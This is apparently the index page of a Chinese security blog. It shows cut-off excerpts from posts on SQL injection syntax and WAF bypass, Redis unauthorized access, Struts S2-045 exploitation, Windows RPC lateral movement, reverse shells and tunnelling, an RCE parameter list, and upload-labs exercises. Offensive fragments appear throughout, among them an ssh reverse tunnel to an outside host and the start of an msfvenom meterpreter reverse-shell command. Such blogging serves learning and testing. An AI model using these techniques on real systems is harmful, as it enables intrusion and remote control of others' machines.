Re:从零开始的安全之旅

今天跟朋友一起合租了一台看起来还不错的独立服务器，因为内存挺大的，所以想折腾一下。 服务器简单评测 购买链接https://www.ssdnodes.com/manage/aff.php?aff=1574 结果这个网站的管理后台太拉胯了，除了一个vnc功能和重装功能，就没别的了 鉴于目前网上没有完整的好用的docker安装kali+桌面连接的教程，所以我想做一个。 准备工作麻了，这服务器供应商提供的镜像是真的纯净，纯净到啥都没有。 问题一：Centos8源有问题Error: Failed to download metadata for repo 'appstream': Cannot prepare internal mirrorlist: No URLs in mirrorlist 解决办法自2022年1月31日起，CentOS团队从官方镜像中移除CentOS 8的所有包，但软件包仍在官方镜像上保留一段时间。现在被转移到https://vault.centos.org。如需继续运行旧CentOS 8，可以在/etc/yum.repos中更 ...

数据库语法整理及WAF绕过方式关系型数据库关系型数据库：指采用了关系模型来组织数据的数据库。 直白的说就是：关系型数据库最典型的数据结构是表，由二维表及其之间的联系所组成的一个数据组织 当今主流的关系型数据库有：Oracle，Microsoft SQL Server，MySQL，PostgreSQL，DB2， Microsoft Access， SQLite，MariaDB OracleOracle特性： 1select id,contents,time from news where news_id=1 ① union ② select ③ 1,2,db_name() ④ from ⑤ admin 位置一 可利用其他控制字符替换空格：%00、%09、%0a、%0b、%0c、%0d 可利用其他符号：. 位置二 可利用其他控制字符替换空格：%00、%09、%0a、%0b、%0c、%0d 位置三 可利用其他控制字符替换空格：%00、%09、%0a、%0b、%0c、%0d 可利用其他符号：+ 、- 、%ad 位置四 可利用其他控制字符替换空格：%00、%09、%0a、 ...

Redis未授权漏洞 Redis_百度百科 (baidu.com) redis是一个key-value存储系统。和Memcached类似，它支持存储的value类型相对更多，包括string(字符串)、list(链表)、set(集合)、zset(sorted set –有序集合)和hash（哈希类型）。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作，而且这些操作都是原子性的。在此基础上，redis支持各种不同方式的排序。与memcached一样，为了保证效率，数据都是缓存在内存中。区别的是redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件，并且在此基础上实现了master-slave(主从)同步。 Redis 是一个高性能的key-value数据库。 redis的出现，很大程度补偿了memcached这类key/value存储的不足，在部 分场合可以对关系数据库起到很好的补充作用。它提供了Java，C/C++，C#，PHP，JavaScript，Perl，Object-C，P ...

背景​ 整点实战。 1.搜集目标​ 新手想快速寻找目标，最快的方法是什么？当然是FOFA快速检索啦 获取到目标http://x.x.x.x 2.漏洞检测 这里推荐一个很好用的漏洞验证平台：vulmap zhzyker/vulmap： Vulmap 是一款 web 漏洞扫描和验证工具， 可对 webapps 进行漏洞扫描， 并且具备漏洞验证功能 (github.com) 使用vulmap对该目标进行常见漏洞检测： 检测发现两个漏洞，分别是S2-045和S2-046 。 漏洞说明0x01 漏洞简介Apache Struts是一套用于创建企业级Java Web 应用的开源MVC框架 。Apache Struts 2.3.5 – 2.3.31版本及2.5 – 2.5.10版本存在远程代码执行漏洞（CNNVD-201703-152 ，CVE-2017-5638）。该漏洞是由于上传功能的异常处理函数没有正确处理用户输入的错误信息。导致远程攻击者可通过发送恶意的数据包，利用该漏洞在受影响服务器上执行任意命令。漏洞编号：S2-045CVE编号：CVE-2017-5638漏洞类型：远 ...

通过Windows RPC批量寻找“出网”机器在获取内网通用口令的情景下，如何从大量的主机中寻找可以访问互联网的据点作为守控的高地？ 0x00 视窗 RPCRPC（Remote Procedure Call）远程过程调用协议，一种通过网络从远程计算机上安装请求服务，而不需要了解底层网络技术的协议。RPC它假定某些协议的存在，例如TCP/UDP等，为通信程序之间携带信息数据。在OSI网络七层模型中，RPC跨越了传输层和应用层，RPC使得开发，包括网络分布式多程序在内的应用程序更加容易。在Windows操作系统中，RPC（Remote Procedure Call） 已经存在了许久，一些漏洞挖掘研究员也已经将RPC相关的漏洞挖的差不多了。但是想要调用Windows RPC接口完成某些事情，我感觉比直接使用Windows API麻烦很多，最近一直在看Windows RPC相关的知识，也实现了一些小工具，但最终我发现还是impacket香！ Windows RPC实现的小工具-远程/本地创建任务计划： 在本文开始之前，不得不提一下之前的文章也是调用的Windows RPC ...

代理隧道反弹shell在日常使用中大部分记过了，此外还有ssh反向连接 1ssh -f -N -R 10000:localhost:22 lyb@3322.org 10000是主机B上的本地连接端口， 22是主机B上远程连接的那个端口，lyb@3322.org是对方的地址，主机b运行 1ssh lyb@localhost -p 10000 端口转发lcx（经典）FPipeSsocks正向代理和反向代理frphttps://github.com/fatedier/frp/ 可用于内网穿透的高性能的反向代理应用，，支持 tcp, udp 协议，为 http 和 https 应用协议提供了额外的能力，且尝试性支持了点对点穿透 web代理reGeorg 代理是实现内网之间的通信；隧道是实现防火墙绕过，流量监控 ngrok 12345678910111213141516171819202122232425msfvenom -p windows/meterpreter/reve ...

关于远程代码执行的常用Payload（Unix 和 Windows） RCE ： 远程执行代码 （RCE） 使攻击者能够执行注入攻击导致的恶意代码。代码注入攻击不同于命令注入攻击。攻击者的能力取决于服务器端解释器的限制。在某些情况下，攻击者可能能够从代码注入升级到命令注入。远程代码评估可能导致易受攻击的 Web 应用程序和 Web 服务器完全受损。重要的是要注意，几乎每种编程语言都有代码评估功能。 寻找RCE前 46 个 RCE 参数12345678910111213141516171819202122232425262728293031323334353637383940414243444546exec={payload}command={payload}execute={payload}ping={payload}include={payload}exclude={payload}jump={payload}code={payload ...

upload-labs靶机包含漏洞类型分类: 如何判断上传漏洞类型: 0x01.pass-01(客户端js检查)源码1234567891011121314151617function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 var allow_ext = ".jpg|.png|.gif"; //提取上传文件的类型 var ext_name = file.substring(file.lastIndexOf(".")); //判断上传文件类型是否允许上传 if (allow_ext.indexOf(e ...

基础命令 MySQL 是最流行的关系型数据库管理系统，在 WEB 应用方面 MySQL 是最好的 RDBMS(Relational Database Management System：关系数据库管理系统)应用软件之一。mysql数据库通过sql来操作数据库 mysql中的注释符 @ # – （杠杠空格） （注入中经常用到的） /* ….. */ /*! …. */ information_schema mysql 5.0版本之后产生了一个虚拟数据库information_schema，在这个数据库中有三个很重要的表： information_schema: 该数据表存储了mysql数据库中的所有数据库的库名 information_schema.tables： 该数据表存储了mysql数据库中的所有数据表的表名 information_schema.columns: 该数据表存储了mysql数据库中的所有列的列名 mysql中比较常用的一些函数： version()： 查询数 ...

centos7.6部署搜图bot1.安装go-cqhttp1.首先从cq项目下载适合的cq，项目地址：[Mrs4s/go-cqhttp: cqhttp的golang实现，轻量、原生跨平台. (github.com)](https://github.com/Mrs4s/go-cqhttp/tree/master) 2.配置go-cqhttp123456# 新建目录mkdir cqcd cq/#上传go-cqhttp到该目录下#运行cq./go-cqhttp 3.修改go-cqhttp的配置文件config.yum添加正向WS 123456789101112131415# 连接服务列表servers: # 添加方式，同一连接方式可添加多个，具体配置说明请查看文档 #- http: # http 通信 #- ws: # 正向 Websocket #- ws-reverse: # 反向 Websocket #- pprof: #性能分析服务器 # 正向WS设置 - ws: # 正向WS服务器监听地址 address: 0.0.0.0:6700 ...